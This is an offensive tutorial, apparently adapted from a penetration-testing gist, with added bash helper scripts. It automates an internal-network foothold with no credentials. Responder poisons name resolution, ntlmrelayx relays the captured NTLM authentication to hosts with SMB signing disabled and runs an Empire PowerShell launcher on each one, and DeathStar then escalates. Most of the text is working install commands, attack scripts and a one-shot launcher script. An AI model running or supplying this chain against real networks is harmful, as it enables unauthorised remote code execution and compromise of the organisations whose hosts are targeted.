Pwning internal networks automagically

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install impacket (ntlmrelayx)

One thing I'm still figuring out: if I install impacket (which is where ntlmrelayx lives) as the first tool, these steps work fine:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .

However, if I install other tools like Empire first, the impacket install complains that it can't install/uninstall the updated version. When I raised this as an issue, the suggested fix was to remove the Kali package first:

sudo apt-get remove python-impacket
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .

However, by doing that it rips out a bunch of other packages, so then you have to reinstall them with something like:

apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y

So long story short: handle the ntlmrelayx install with care.

Download and install Empire

git clone https://github.com/EmpireProject/Empire.git /opt/empire
cd /opt/empire
./setup/install.sh

Download DeathStar

git clone https://github.com/byt3bl33d3r/DeathStar.git /opt/deathstar

Download responder

git clone https://github.com/lgandx/Responder.git /opt/responder

Now open /opt/responder/Responder.conf and turn SMB and HTTP off. Responder and ntlmrelayx can't both bind ports 445 and 80; we want ntlmrelayx on those ports so the connections Responder poisons toward us get relayed instead of just captured:

[Responder Core]

; Servers to start
SQL = On
SMB = Off <-- it's usually "On" so change to "Off"
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off <-- it's usually "On" so change to "Off"
HTTPS = On
DNS = On
LDAP = On
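The following is an added example, not code from the original gist or from Responder: a couple of shell functions that read and flip the server toggles in the [Responder Core] section so you can check the file is right before starting anything. It assumes the "Name = On/Off" layout shown above; the sample config written by make_sample_conf is constructed for the demo, and the function names are mine.

```bash
#!/bin/bash
# Added example, not from the original gist: read and flip the server toggles
# in the [Responder Core] section of Responder.conf so the change can be checked
# before Responder starts. Assumes the "Name = On/Off" layout shown above. The
# sample config written by make_sample_conf is constructed for this demo.

# Print the On/Off value of server $2 (e.g. SMB) in [Responder Core] of file $1.
responder_server_state() {
    awk -v name="$2" '
        /^\[/ { core = ($0 == "[Responder Core]") }
        core && $1 == name && $2 == "=" { print $3; exit }
    ' "$1"
}

# Set server $2 to Off in [Responder Core] of file $1, editing in place and
# leaving same-named keys in other sections alone.
disable_responder_server() {
    conf="$1"
    awk -v name="$2" '
        /^\[/ { core = ($0 == "[Responder Core]") }
        core && $1 == name && $2 == "=" { $0 = name " = Off" }
        { print }
    ' "$conf" > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# ntlmrelayx needs ports 445 and 80 for itself, so Responder's own SMB and HTTP
# servers must both be Off before the two are run side by side.
responder_ready_for_relay() {
    [ "$(responder_server_state "$1" SMB)" = "Off" ] &&
    [ "$(responder_server_state "$1" HTTP)" = "Off" ]
}

# Constructed sample: a default-looking [Responder Core] plus a second section
# with its own SMB key, to show that only the core section is touched.
make_sample_conf() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On

[Some Other Section]
SMB = On
EOF
    echo "$f"
}

# Usage against the real file (back it up first):
#   cp /opt/responder/Responder.conf /opt/responder/Responder.conf.bak
#   disable_responder_server /opt/responder/Responder.conf SMB
#   disable_responder_server /opt/responder/Responder.conf HTTP
#   responder_ready_for_relay /opt/responder/Responder.conf && echo ready
```

The awk scripts key on the section header rather than blindly replacing every "SMB = On", so a same-named key somewhere else in the file stays as it was.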

Create a list of targets that have SMB signing disabled (relaying NTLM to SMB only works against hosts that don't require signing):

mkdir -p /scripts
cd /scripts
/opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

The resulting targets.txt should have a list of IPs with SMB signing disabled:

192.168.55.36
192.168.55.144
192.168.55.199
...
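Here is an added example (mine, not from the original gist or from Responder) that does the same filtering as the grep pipeline above but also drops duplicate hosts, leaves out your own IP so you never relay to yourself, and sorts numerically. The lines written by make_sample_hosts are constructed for the demo in the shape of RunFinger's -g output; the function names are assumptions, and the "Signing:'False'" marker is the one the page greps for, so adjust it if your RunFinger version prints it differently.

```bash
#!/bin/bash
# Added example, not from the original gist: turn the output of
# "RunFinger.py -g" into targets.txt, keeping only hosts that report SMB signing
# disabled, dropping duplicates and our own IP, and sorting numerically. The
# lines written by make_sample_hosts are constructed for this demo in the shape
# of RunFinger's -g output; adjust the "Signing:'False'" marker if your
# RunFinger version prints it differently.

# Print one IPv4 per line for each host whose RunFinger line says
# Signing:'False'. $1 = RunFinger output file, $2 = our own IP to exclude
# (optional; we never want to relay back to ourselves).
unsigned_targets() {
    grep "Signing:'False'" "$1" \
      | awk -v self="${2:-}" '
            match($0, /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
                ip = substr($0, RSTART, RLENGTH)
                if (ip != self) print ip
            }' \
      | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n \
      | uniq
}

# Write the targets from RunFinger output $1 to file $2, excluding our own
# IP $3, and print how many targets were written.
write_targets() {
    unsigned_targets "$1" "$3" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Constructed sample: three signing-off workstations (one listed twice), a
# domain controller with signing on, and our own Kali box.
make_sample_hosts() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
['192.168.55.36', 'Os:Windows 7 Professional 7601 Service Pack 1', 'Domain:CORP', 'Signing:'False'']
['192.168.55.144', 'Os:Windows 10 Pro 17134', 'Domain:CORP', 'Signing:'False'']
['192.168.55.1', 'Os:Windows Server 2012 R2 Standard 9600', 'Domain:CORP', 'Signing:'True'']
['192.168.55.199', 'Os:Windows 7 Professional 7601 Service Pack 1', 'Domain:CORP', 'Signing:'False'']
['192.168.55.144', 'Os:Windows 10 Pro 17134', 'Domain:CORP', 'Signing:'False'']
['192.168.55.50', 'Os:Kali', 'Domain:WORKGROUP', 'Signing:'False'']
EOF
    echo "$f"
}

# Usage for real:  write_targets /scripts/hosts.txt /scripts/targets.txt YOUR.IP
```

The awk match() takes only the first IP on each line, which avoids picking up any other dotted numbers RunFinger might print, and the domain controller with signing on is dropped at the grep stage.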

Create batch of scripts so you're ready to automate the pwnage!

sudo mkdir -p /scripts
sudo chown "$USER" /scripts   # the > redirects below run as your user, not as root, so you need to own the directory
cd /scripts
echo '#!/bin/bash' > empire.sh
echo "cd /opt/empire" >> empire.sh
echo "sudo ./empire --rest --username empireadmin --password Password123" >> empire.sh
echo '#!/bin/bash' > deathstar.sh
echo "sudo /opt/deathstar/DeathStar.py --listener-ip YOUR.IP -t 100" >> deathstar.sh
echo '#!/bin/bash' > ntlmrelayx.sh
echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." >> ntlmrelayx.sh
echo "sudo python /opt/impacket/examples/ntlmrelayx.py -tf /scripts/targets.txt -c 'YOUR-POWERSHELL'" >> ntlmrelayx.sh
echo '#!/bin/bash' > responder.sh
echo "sudo python /opt/responder/Responder.py -I YOUR-LAN-INTERFACE -r -d -v" >> responder.sh

Now open the scripts in /scripts and fill in the placeholders (YOUR.IP, YOUR-LAN-INTERFACE). You can't fill in YOUR-POWERSHELL in ntlmrelayx.sh just yet; that comes out of Empire in the "Get Empire PowerShell code for ntlmrelayx.sh" section below.

Set all scripts as executable

cd /scripts
chmod +x deathstar.sh
chmod +x empire.sh
chmod +x ntlmrelayx.sh
chmod +x responder.sh

Run Empire

Get Empire running in a screen session (the -L flag makes screen log the session to screenlog.0 in the current directory, which is where you'll grab the launcher from in a moment):

cd /scripts
screen -S empire -dm -L /scripts/empire.sh

Run DeathStar

Get DeathStar running in a screen session:

screen -S deathstar -dm /scripts/deathstar.sh

Get Empire PowerShell code for ntlmrelayx.sh

Connect to the Empire screen session

screen -R empire

At the empire prompt, run these commands to get the DeathStar PowerShell code:

listeners
launcher powershell DeathStar

Now press Ctrl+A and then D to detach from the screen session. In /scripts there should be a screenlog.0 file, which logs everything that happened in the Empire screen session. Do a cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==

Next, open /scripts/ntlmrelayx.sh and replace YOUR-POWERSHELL with the launcher you got in the previous step. The launcher sits inside single quotes (one before powershell and one after the base64 blob), so the whole thing has to land between those two quotes and must not contain a single quote of its own. ntlmrelayx will run that command on each host in targets.txt where the relayed user has admin rights.
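As an added example (mine, not from the original gist, Empire or impacket), here is a way to pull the launcher out of screenlog.0 and write ntlmrelayx.sh from it instead of pasting by hand, with a check that the launcher can actually be single-quoted. The ntlmrelayx path and the -tf/-c flags are the ones used above; the screenlog content and the base64 blob written by make_sample_screenlog are constructed placeholders for the demo, not a real stager, and the function names are mine.

```bash
#!/bin/bash
# Added example, not from the original gist: pull the Empire launcher out of
# screenlog.0 and generate ntlmrelayx.sh from it rather than pasting by hand.
# The launcher ends up inside single quotes on ntlmrelayx's -c argument, so a
# launcher that itself contains a single quote is refused. The ntlmrelayx path
# is the one used above; the screenlog content and the base64 blob written by
# make_sample_screenlog are constructed placeholders for this demo, not a real
# stager.

SAMPLE_B64=QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==

# Print the last launcher line in screenlog $1: "powershell ..." followed by a
# long base64 run. Screen logs raw terminal output, so colour/cursor escape
# sequences and carriage returns are stripped first. The echoed command
# "launcher powershell DeathStar" has no base64 blob and so never matches.
extract_launcher() {
    esc=$(printf '\033')
    tr -d '\r' < "$1" \
      | sed "s/${esc}\[[0-9;?]*[a-zA-Z]//g" \
      | grep -o 'powershell .*[A-Za-z0-9+/]\{40,\}=*' \
      | tail -n 1
}

# Write relay script $1 that runs launcher $2 via ntlmrelayx on every host in
# target file $3. Rejects launchers with a single quote (would break -c quoting)
# or that do not start with powershell (guards against grabbing the wrong line).
write_relay_script() {
    out="$1"; launcher="$2"; targets="$3"
    case "$launcher" in
        *\'*)        echo "launcher contains a single quote, refusing" >&2; return 1 ;;
        powershell*) ;;
        *)           echo "launcher does not start with powershell, refusing" >&2; return 1 ;;
    esac
    {
        echo '#!/bin/bash'
        echo "sudo python /opt/impacket/examples/ntlmrelayx.py -tf $targets -c '$launcher'"
    } > "$out"
    chmod +x "$out"
}

# Constructed screenlog: the echoed Empire command, the launcher wrapped in the
# kind of escape sequences screen records, and the prompt that follows.
make_sample_screenlog() {
    f=$(mktemp)
    esc=$(printf '\033')
    cat > "$f" <<EOF
(Empire: listeners) > launcher powershell DeathStar
${esc}[0mpowershell -noP -sta -w 1 -enc  ${SAMPLE_B64}${esc}[0m
(Empire: listeners) >
EOF
    echo "$f"
}

# Usage for real:
#   write_relay_script /scripts/ntlmrelayx.sh "$(extract_launcher /scripts/screenlog.0)" /scripts/targets.txt
```

Taking the last match with tail means that if you generated the launcher more than once, you get the most recent one, and the base64-run requirement keeps the echoed "launcher powershell DeathStar" command line from being mistaken for the launcher itself.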

Launch ntlmrelayx.sh

Run a new screen session with ntlmrelayx:

screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh

Note: you might find that when running ntlmrelayx.sh the console barfs up some weird error like:

Traceback (most recent call last):
  File "examples/ntlmrelayx.py", line 45, in <module>
    from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/__init__.py", line 1, in <module>
    from httprelayserver import HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 27, in <module>
    from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/__init__.py", line 3, in <module>
    from ldaprelayclient import LDAPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 17, in <module>
    from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS

If that happens, the /usr/lib/python2.7/dist-packages path in the traceback is the giveaway: Python is picking up Kali's packaged python-impacket rather than the copy cloned to /opt/impacket, and the ldap3 it's running against doesn't export RESULT_SUCCESS (it's too old). Rip and replace impacket as described in the install section above, and see the GitHub issue referenced there.

Launch Responder

Run a new screen session with Responder:

screen -S responder -dm /scripts/responder.sh

Keep an eye on Empire and DeathStar screen sessions to watch the shells come pouring in:

screen -R empire
screen -R deathstar

Have fun :-)

Quick start for next time

Put the following commands in a file called /scripts/pwn.sh and chmod +x it (the cd keeps screenlog.0 landing in /scripts no matter where you launch pwn.sh from):

#!/bin/bash
cd /scripts
screen -S empire -dm -L /scripts/empire.sh
screen -S deathstar -dm /scripts/deathstar.sh
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
screen -S responder -dm /scripts/responder.sh

Resources:
